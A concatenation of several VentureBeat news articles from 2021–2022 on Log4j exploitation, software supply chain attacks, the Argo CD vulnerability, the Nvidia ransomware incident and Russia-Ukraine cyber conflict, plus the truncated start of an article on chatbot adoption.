a lot of their income is by being able to affect an entire organization,” Murphy said. “That’s the kind of chaos where people are more willing to pay those ransom demands.” Thus, after an attacker lands on a server on a corporate network, they’ll first have to figure out what other devices they can “talk to” from that server, he said. Then, they’ll have to figure out what applications are running on those devices—and determine how to make their way from the server to laptops that are connected to it, Murphy said. This means that it might take some time before major ransomware attacks actually surface from the discovery of Log4Shell. “There’s activity that needs to happen after they’ve exploited the Log4j vulnerability to really gain more control over the network that they landed in,” Murphy said. Widespread vulnerability Many enterprise applications and cloud services written in Java are potentially vulnerable due to the flaws in Log4j prior to version 2.17, which was released last Friday. The open source logging library is believed to be used in some form—either directly or indirectly by leveraging a Java framework—by the majority of large organizations. Version 2.17 of Log4j is the third patch for vulnerabilities in the software since the initial discovery of a remote code execution (RCE) vulnerability on December 9. Security firm Check Point reported Monday it has observed attempted exploits of vulnerabilities in Log4j on more than 48% of corporate networks worldwide. The ransomware problem had already gotten much worse this year. For the first three quarters of 2021, SonicWall reported that attempted ransomware attacks surged 148% year-over-year. CrowdStrike reports that the average ransomware payment climbed by 63% in 2021, reaching $1.79 million. Attempted attacks against targets in the U.S. and Europe have been observed using ransomware from the TellYouThePass family, Sophos researchers told VentureBeat on Tuesday. Ransomware is just one of many major threats potentially posed by the Log4j vulnerability, however. There’s a higher, but less visible, danger related to Log4Shell, according to Dotan. And that is the existence of “sophisticated hacker groups and state-backed hackers who don’t intend to cash out on this opportunity right now,” he said. Instead, those threat actors would “rather install a backdoor and secretly take control over injected servers over the coming months, without their owners knowing about it,” Dotan said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,153
2,022
"Major attacks using Log4j vulnerability 'lower than expected' | VentureBeat"
"https://venturebeat.com/2022/01/24/major-attacks-using-log4j-vulnerability-lower-than-expected"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Major attacks using Log4j vulnerability ‘lower than expected’ Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Thanks in large part to the massive response effort from the security community, there have been few cyber attacks of consequence leveraging the vulnerabilities in Apache Log4j so far, according to findings from cybersecurity giant Sophos. On the whole, successful attacks using the Log4j flaws have been limited, said Chester Wisniewski, principal research scientist at Sophos, in a blog today. Like other cyber vendors, the Sophos Managed Threat Response Team (MTR) has detected a large number of scans and attempts to use exploits for the remote code execution vulnerability, known as Log4Shell. But as of early January, “only a handful of MTR customers faced attempted intrusions where Log4j was determined to be the initial entry point,” Wisniewski wrote. Most of those intrusions were by cryptocurrency miners. “The overall number of successful attacks to date remains lower than expected,” he wrote. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Still, the broad scope of the Log4Shell vulnerability, and the difficulty of finding all instances of it, suggest the bug “will likely be a target for exploitation for years to come,” Wisniewski wrote. Widespread vulnerability If unpatched, many enterprise applications and cloud services written in Java are potentially vulnerable to the flaws in Log4j. The open source logging library is believed to be used in some form — either directly or indirectly by leveraging a Java framework — by the majority of large organizations. The initial Log4j vulnerability, revealed on December 9, could be used to enable remote execution of code by unauthenticated users. However, “Sophos believes that the immediate threat of attackers mass exploiting Log4Shell was averted because the severity of the bug united the digital and security communities and galvanized people into action,” Wisniewski wrote. “This was seen back in 2000 with the Y2K bug, and it seems to have made a significant difference here.” Few major attacks using Log4j have been disclosed to date. On December 20, the defense ministry in Belgium disclosed that a portion of its network was shut down after a cyberattack. The attack had resulted from an exploitation of the vulnerability in Log4j, the defense ministry said. Cyber firm Qualys previously told VentureBeat it has observed “attempted ransomware attacks, some of which have been successful – by Conti, Khonsari, and some nation-state-backed adversaries,” said Travis Smith, director of malware threat research at Qualys, in an email. Specifics of the attacks were not disclosed. Disrupted attacks Other attacks that have been reported were disrupted midway through. For instance, on December 29, CrowdStrike said its threat hunters identified and disrupted an attack by a state-sponsored group based in China, which involved an exploit of the Log4j vulnerability. CrowdStrike said that threat hunters on its Falcon OverWatch team intervened to help protect a “large academic institution,” which wasn’t identified, from a hands-on-keyboard attack that appears to have used a modified Log4j exploit. In addition to the widespread response from the security community, another potential reason that mass exploitation has been kept to a minimum “could be the need to customize the attack to each application that includes the vulnerable Apache Log4J code,” Wisniewski wrote. Nonetheless, “just because we’ve steered round the immediate iceberg, that doesn’t mean we’re clear of the risk,” he said. “Some of the initial attack scans may have resulted in attackers securing access to a vulnerable target, but not actually abusing that access to deliver malware, for instance – so the successful breach remains undetected,” Wisniewski wrote. “Sophos believes that attempted exploitation of the Log4Shell vulnerability will likely continue for years and will become a favourite target for penetration testers and nation-state supported threat actors alike,” he wrote. “The urgency of identifying where it is used in applications and updating the software with the patch remains as critical as ever.” Long tail Other cyber experts have previously made similar to comments to VentureBeat, saying that the worst of the attacks utilizing the Log4j flaws may actually be months — or even years — into the future. “In many cases, attackers breach a company, gain access to networks and credentials, and leverage them to carry out huge attacks months and years later,” said Rob Gurzeev, cofounder and CEO of CyCognito, in a previous email to VentureBeat. Once they’ve established a foothold, sophisticated attackers will often take their time in surveying users and security protocols before executing the full brunt of their attacks, said Hank Schless, senior manager for security solutions at Lookout. This helps them strategize how to most effectively avoid existing security practices and tools, Schless said, “while simultaneously identifying what parts of the infrastructure would be most effective to encrypt for a ransomware attack.” Ultimately, due to the widespread nature of the flaw, “the long tail on this vulnerability is going to be pretty long,” said Andrew Morris, the founder and CEO at GreyNoise Intelligence, in a previous interview. “It’s probably going to take a while for this to get completely cleaned up. And I think that it’s going to be a little bit before we start to understand the scale of impact from this.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,154
2,021
"Report: Software supply chain attacks increased 300% in 2021 | VentureBeat"
"https://venturebeat.com/2022/01/27/report-software-supply-chain-attacks-increased-300-in-2021"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Report: Software supply chain attacks increased 300% in 2021 Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Software supply chain attacks grew by more than 300% in 2021, according to a study from Argon Security , recently acquired by Aqua Security. The report found that the level of security across software development environments remains low, and every company evaluated had vulnerabilities and misconfigurations that can expose them to supply chain attacks. The study identified three primary areas of risk that companies should understand and address to improve software supply chain security. Vulnerable package usage is one of the fastest-growing methods of carrying out a software supply chain attack. Two common attacks that leverage vulnerable packages are: 1) exploiting packages’ existing vulnerabilities to obtain access to the application and execute the attack, and; VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! 2) planting malicious code in popular open source packages and private packages to trick developers or automated pipeline tools into incorporating them as part of the application build process. Furthermore, compromised CI/CD pipeline can expose an application’s source code. This type of breach is difficult to identify and can cause significant damage if left undetected. Attackers can take advantage of privileged access, misconfigurations, and vulnerabilities in the CI/CD pipeline infrastructure, which provides access to critical IT infrastructure, development processes, source code, and applications. It enables attackers to change code or inject malicious code during the build process and tamper with applications. Finally, code/artifact integrity was another one of the main risk areas identified. The upload of bad code to source code repositories directly impacts artifact quality and security posture. Common issues that were found in most customer environments were sensitive data in code, code quality and security issues, infrastructure as code issues, container image vulnerabilities and misconfigurations. Many issues that were discovered required time-intensive cleanup projects to reduce exposure. Findings were based on a six-month analysis of customer security assessments conducted by Argon’s researchers to determine the state of enterprise security and readiness to defend against software supply chain attacks. Read the full report by Argon Security and Aqua Security. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,155
2,022
"Unclear if Nvidia cyber 'incident' tied to Russia and Ukraine | VentureBeat"
"https://venturebeat.com/2022/02/25/unclear-if-nvidia-cyber-incident-tied-to-russia-ukraine"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Unclear if Nvidia cyber ‘incident’ tied to Russia and Ukraine Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Technology giant Nvidia has reportedly experienced a “potential” cyberattack, but it’s not yet clear if there is a connection to Russia’s military invasion of Ukraine and Vladimir Putin’s pledges to retaliate against the west over the conflict. According to The Telegraph, Nvidia, one of the largest producers of graphics chips, has been investigating “a potential cyberattack that has taken parts of its business offline for two days.” In a statement provided by Nvidia to VentureBeat on Friday, the company did not directly confirm that a cyberattack had occurred. Instead, Nvidia said that an unspecified “incident” had occurred. “We are investigating an incident,” an Nvidia spokesperson said in the statement. “Our business and commercial activities continue uninterrupted,” the spokesperson said in the statement. “We are still working to evaluate the nature and scope of the event and don’t have any additional information to share at this time.” VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Quoting an unnamed “insider” at Nvidia, The Telegraph reported that the potential cyberattack had “completely compromised” internal systems at the company — “although some email services were working on Friday,” the report said. The potential “malicious network intrusion” has caused outages for the company’s email systems and developer tools, the report says. The report specifies that “there is no evidence linking Nvidia’s outages to the conflict” in Ukraine, which has involved an unprovoked assault on the country recently by Ukraine’s neighbor Russia. A subsequent report from Bloomberg on Friday said that the incident “appears” to have involved a ransomware attack. Citing a source familiar with the situation, the report suggests the attack was “relatively minor” and not connected to Russia’s war against Ukraine. VentureBeat has reached out to Nvidia about the Bloomberg report. Increased cyberattacks Regardless of the true details of the Nvidia incident, “there will no doubt” be a pickup in cyberattacks in the coming days and weeks, said Rick Holland, CISO at Digital Shadows. However, “defenders shouldn’t conflate and immediately assume that these attacks are retaliation from western sanctions against Russia,” Holland said in an email to VentureBeat. “This response is possible, but it needs to be investigated and validated. Ransomware crews have been extorting victims for years and will continue to do so.” In his addresses recently, Putin has clarified it that the entire Western world is his enemy and all options are on the table, according to Eric Byres, a cybersecurity veteran who is now CTO of aDolus Technology. In his speech on Thursday, for instance, Putin said that “I would now like to say something very important for those who may be tempted to interfere in these developments from the outside. No matter who tries to stand in our way or all the more so create threats for our country and our people, they must know that Russia will respond immediately, and the consequences will be such as you have never seen in your entire history.” Provocative approach Russia and government-linked groups have a significant cyber offense capability. Past attacks and current threats from Russia have represented one of the biggest drivers for the security industry for years. However, Byres told VentureBeat that he originally believed that Putin “was a rational actor that wouldn’t want to launch major cyberattacks in the U.S., as that would provoke similar attacks in response.” But “after reading the full translation of his speech on Tuesday, reviewing the commentary from a number of Russian political analysts and talking to cyber analysts looking at known intrusions in the U.S., I’m not so sure anymore,” Byres said. “I worry that Putin believes he is bulletproof and the U.S. is weak.” Russian cyber offensives have also been playing a role in the country’s build-up to its assault on Ukraine this week. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. Fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware , struck Ukraine on Wednesday just ahead of the invasion. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,156
2,022
"Major vulnerability found in open source dev tool for Kubernetes | VentureBeat"
"https://venturebeat.com/2022/02/03/major-vulnerability-found-in-open-source-dev-tool-for-kubernetes"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Major vulnerability found in open source dev tool for Kubernetes Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Researchers today disclosed a zero-day vulnerability in Argo CD, an open source developer tool for Kubernetes, which carries a “high” severity rating. The vulnerability (CVE-2022-24348) was uncovered by the research team at cloud-native application protection firm Apiiro. The company says it reported the vulnerability to the open source Argo project before disclosing the flaw on its blog today. The bug affects all versions of Argo CD, and patches are now available. Argo CD is a continuous delivery platform for developers that use Kubernetes , the dominant container orchestration system. Exploits of the vulnerability in Argo CD could allow an attacker to acquire sensitive information — including passwords, secrets, and API keys — through utilization of malicious Kubernetes Helm Charts, Moshe Zioni, vice president of security research at Apiiro, wrote in a blog post. Helm Charts are YAML files used to manage Kubernetes applications. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Zioni said the vulnerability has been given a severity rating of “high” (7.7), though as of this writing, the National Institute of Standards and Technology (NIST) website had not yet posted the rating. In an email to VentureBeat, Zioni said the vulnerability could potentially have a “very significant impact on the industry” since Argo CD is used by thousands of organizations. The open source project has more than 8,300 stars on GitHub. The Argo CD platform enables declarative specifications for applications as well as automated deployments leveraging GitHub. Intuit donated the project to the Cloud Native Computing Foundation in 2020 after acquiring its creator, Applatix, in 2018. Potential threats The newly disclosed flaw in Argo CD “allows malicious actors to load a Kubernetes Helm Chart YAML file to the vulnerability and ‘hop’ from their application ecosystem to other applications’ data outside of the user’s scope,” Zioni said in the Apiiro blog post. Thus, attackers “can read and exfiltrate secrets, tokens, and other sensitive information residing on other applications,” he said. Exploits of the vulnerability could lead to privilege escalation, lateral movement, and disclosure of sensitive information, Zioni said in the post. Application files “usually contain an assortment of transitive values of secrets, tokens, and environmental sensitive settings,” he said. “This can effectively be used by the attacker to further expand their campaign by moving laterally through different services and escalating their privileges to gain more ground on the system and target organization’s resources.” The impact of the vulnerability “can especially become critical in environments that make use of encrypted value files (e.g. using plugins with git-crypt or SOPS) containing sensitive or confidential data, and decrypt these secrets to disk before rendering the Helm chart,” a representative for the Argo CD project said in a security advisory on GitHub. “We urge users of Argo CD to update their installation to one of the fixed versions,” the advisory says. Zioni said that the Argo CD team provided a “swift” response after being informed about the vulnerability. Open source insecurity The disclosure of the vulnerability in Argo CD comes amid growing concerns about the prevalence of insecure software supply chains. High-profile incidents have included the SolarWinds and Kaseya breaches, while overall attacks involving software supply chains surged by more than 300% in 2021, Aqua Security reported. Meanwhile, open source vulnerabilities such as the widespread flaws in the Apache Log4j logging library and the Linux polkit program have underscored the issue. On Monday, The Open Source Security Foundation announced a new project designed to secure the software supply chain, backed by $5 million from Microsoft and Google. “We are seeing more advanced persistent threats that leverage zero day and known, unmitigated vulnerabilities in software supply chain platforms, such as Argo CD,” said Yaniv Bar-Dayan, cofounder and CEO at cybersecurity risk management vendor Vulcan Cyber, in an email to VentureBeat. “We need to do better as an industry before our cyber debt sinks us,” Bar-Dayan said. “IT security teams must collaborate and do the work to protect their development environments and software supply chains from threat actors.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,157
2,022
"Russia will get hit hardest in cyberwar over Ukraine, expert says | VentureBeat"
"https://venturebeat.com/2022/02/25/russia-will-get-hit-hardest-in-cyberwar-over-ukraine-expert-says"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Russia will get hit hardest in cyberwar over Ukraine, expert says Share on Facebook Share on X Share on LinkedIn Vladimir Putin, the president of Russian Federation, on May 29, 2017. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. As substantial as the cyberattack capabilities of Russia’s affiliated hacker groups might be, the worldwide cyber effort to oppose Vladimir Putin’s unprovoked aggression against Ukraine will likely prove to be greater, a former U.S. Cyber Command official told VentureBeat. Anonymous is the most visible group to pledge a cyber offensive against Russia on behalf of Ukraine, but some of the most sophisticated hacker groups are known to avoid attention as much as possible. Research published earlier this week by a Chinese security firm indicates that a U.S.-affiliated organization, referred to as the Equation Group, is in fact “the world’s leading cyber-attack group” — whose attack capability, paired with zero-day vulnerabilities, is essentially “unstoppable.” The cyber battlefield Meanwhile, in Ukraine itself, a Bloomberg report today said that a hacker group that is now forming to bring counterattacks against Russia has amassed 500 members. And beyond Ukraine, “there are probably 100X that number of hacktivists around the world working against Russia because they are the aggressor,” said Christian Sorensen, former operational planning team lead for the U.S. Cyber Command, in an email to VentureBeat. Thus, while Russian ransomware gang Conti, the Belarus-based group known as UNC1151 and several other hacker groups may have pledged to assist Russia with its aggression against Ukraine, the cyber forces on Ukraine’s side will likely turn out to have the upper hand, Sorensen said. (And there’s reason to suspect that even some of Conti’s own affiliates aren’t actually willing to support the Russian government in this situation.) VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Looking ahead, “I think things will ramp up against western targets,” Sorensen said. “But Russia and Belarus will be targeted by these groups even more.” ‘Unprecedented’ situation It’s hard to predict exactly how things might develop, given that this is uncharted territory, however. “It will be unprecedented,” said Marcus Fowler, senior vice president for strategic engagements and threats at Darktrace. “We have not seen a conflict on this scale with such sophisticated offensive cyber capabilities on both sides.” This week, prior to Russia’s invasion of Ukraine, Chinese cybersecurity firm Pangu Lab posted research on the hacker group known as Equation Group — a name given to the group by Russian cybersecurity firm Kaspersky Lab in 2015. The research concerns a backdoor, known as Bvp47, and Pangu contends that its findings suggest that a previous claim about the group — that it is affiliated with the NSA — is correct. (The NSA has never commented on the claim.) Though the backdoor is nearly a decade old, initially discovered in 2013, the Pangu said it is “top-tier” — and evidence that the Equation Group is the “leading” cyberattack group. “Its network attack capability equipped by 0day vulnerabilities was unstoppable, and its data acquisition under covert control was with little effort,” Pangu Labs wrote in the research. “The Equation Group is in a dominant position in national-level cyberspace confrontation.” All of which is consistent with Kaspersky’s assessment of the Equation Group in 2015 , when the company’s research team wrote that the Equation Group “surpasses anything known in terms of complexity and sophistication of techniques” — and a Kaspersky researcher told Ars Technica that the group is “second to none” in terms of skills and abilities. Sorensen, who is now founder and CEO of cybersecurity firm SightGain, said the Pangu research on Equation Group is a “very interesting report, with extraordinary timing” in terms of its publication in the midst of the events this week. And notably, in the report, “the research pointed out a common thread from 10 years ago that also existed in Equation Group report,” Sorensen said. “If that technical detail is still being used, it could slow down or impact operations of people using those tools. Further, it suggests that commonality between toolsets will be a tipoff for initial attribution — and then sometimes watched, and not reported, for 10 or more years.” All in all, with the events of recent days, “we are seeing very clear signs of escalated cyber tensions,” said Stan Golubchik, founder and CEO of cybersecurity firm ContraForce. “We are seeing cyber fully emerge as the fifth domain of war.” Making an impact Ultimately, while it’s not clear how much can be accomplished by anti-Russian cyber forces, there is now the potential for people all around the world to actively participate in trying to thwart a military offensive, Sorensen said. “This is the new nature of cyberwar,” he said. “Whether sanctioned or not, official or not, if people have or can get the right information, know-how, and desire — they can make an impact,” Sorensen said. “We’ll have to wait and see what they are able to do.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,158
2,022
"Going on offense: Ukraine forms an 'IT army,' Nvidia hacks back | VentureBeat"
"https://venturebeat.com/2022/02/26/going-on-offense-ukraine-forms-an-it-army-nvidia-hacks-back"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Going on offense: Ukraine forms an ‘IT army,’ Nvidia hacks back Share on Facebook Share on X Share on LinkedIn Mykhailo Fedorov, Ukraine's vice prime minister, announced on Twitter, "We are creating an IT army." Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. It’s not directly related to the emerging cyber resistance against Russia in Ukraine — but the reports that Nvidia has turned the tables on its attacker in a ransomware incident this week does seem to resonate. Both the Nvidia case, and Ukraine’s effort to launch a cyber offensive against Russia, share a common theme of standing one’s ground and pushing back against aggressors — whether those be power-hungry nation states or cybercriminals. In Ukraine today, Mykhailo Fedorov, the country’s vice prime minister, announced on Twitter, “We are creating an IT army.” “We need digital talents,” wrote Fedorov, who also holds the title of minister of digital transformation — sharing a link to a Telegram channel where he said operational tasks will be distributed. “We continue to fight on the cyber front.” VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! On the Telegram channel, the IT army reportedly posted its list of Russian targets — which were also translated into English “for all IT specialists from other countries.” Anonymous is the most visible group to pledge a cyber offensive against Russia on behalf of Ukraine, but some of the most sophisticated hacker groups are known to avoid attention as much as possible — including some that are believed to be aligned with the U.S. and western countries. On Friday, Christian Sorensen, a former U.S. Cyber Command official, told VentureBeat that “hacktivists around the world [will be] working against Russia, because they are the aggressor.” “I think things will ramp up against western targets, but Russia and Belarus will be targeted by these groups even more” said Sorensen, formerly the operational planning team lead for the U.S. Cyber Command. Hacking back Meanwhile, a ransomware gang that claimed to have attacked Nvidia also reportedly posting a message that the chipmaker had hacked back. The group, Lapsus$, said on its Telegram channel that 1TB of data was removed by Nvidia, according to screenshots shared by Brett Callow, a threat analyst at Emsisoft. The ransomware group, believed to operate in South America, also said that Nvidia had encrypted the group’s data (though the group says it had a backup), according to the screenshots. Nvidia did not immediately respond to a request for comment on Saturday. On Friday, a spokesperson said that Nvidia was “investigating an incident” and was “still working to evaluate the nature and scope of the event.” “Our business and commercial activities continue uninterrupted,” the Nvidia spokesperson said in the statement. The statement came in response to a Friday report in The Telegraph that Nvidia, one of the largest producers of graphics chips, has been investigating “a potential cyber attack that has taken parts of its business offline for two days.” Quoting an unnamed “insider” at Nvidia, The Telegraph reported that the potential cyberattack had “completely compromised” internal systems at the company — “although some email services were working on Friday,” the report said. Preventing leaks Hacking back is “unusual, but certainly not unheard of,” Callow said in a message to VentureBeat. Often the goal is to prevent leaks of stolen data, he said. “I wouldn’t assume any connection to the conflict” in Ukraine, Callow added. Still, you can’t help but notice a common theme in terms of pushing back against cyberattacks. Russian cyber offensives have already been playing a role in the country’s build-up to its assault on Ukraine this week. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. Fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. But on Friday, a Bloomberg report said that a hacker group that was now forming to bring counterattacks against Russia had amassed 500 members. And today, we have the announcement of Ukraine’s IT army — potentially including assistance from hackers around the globe. “Whether sanctioned or not, official or not, if people have or can get the right information, know-how, and desire — they can make an impact,” Sorensen said on Friday, prior to the announcement of Ukraine’s IT army. “We’ll have to wait and see what they are able to do.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,159
2,021
"Despite challenges, Salesforce says chatbot adoption is accelerating | VentureBeat"
"https://venturebeat.com/2021/05/20/despite-challenges-salesforce-says-chatbot-adoption-is-accelerating"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Despite challenges, Salesforce says chatbot adoption is accelerating Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. Chatbot usage has exploded during the pandemic as organizations look to bridge emerging gaps in customer service and onboarding. In 2020, the chatbot market was valued at $17.17 billion, and it is projected to reach $102.29 billion by 2026, according to Mordor Intelligence. There was also a 67% increase in chatbot usage between 2018 and 2020. This uptick correlates with chatbots’ expanding capabilities, as they enable brands to tailor offers and recommendations without humans in the loop. Chatbots leverage customer, product, and interaction data to improve experiences in real time, leading to reduced wait times, service costs, and customer churn. To discuss trends in chatbots and conversational AI more broadly, VentureBeat talked with Greg Bennett, conversational design principal at Salesforce. Bennett believes the technology presents an opportunity for businesses to express their brands through words and languages, creating a greater degree of intimacy with customers. Accelerated adoption According to recent estimates, Gartner predicts that by 2022, 70% of customer interactions will involve emerging technologies such as chatbots — an increase of 15% from 2018. That’s not surprising, considering a significant portion of consumers say they prefer chatbots to other virtual agents. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! “At Salesforce, we’re seeing more than a 700% increase in sessions with our Einstein bot products. I think a lot of 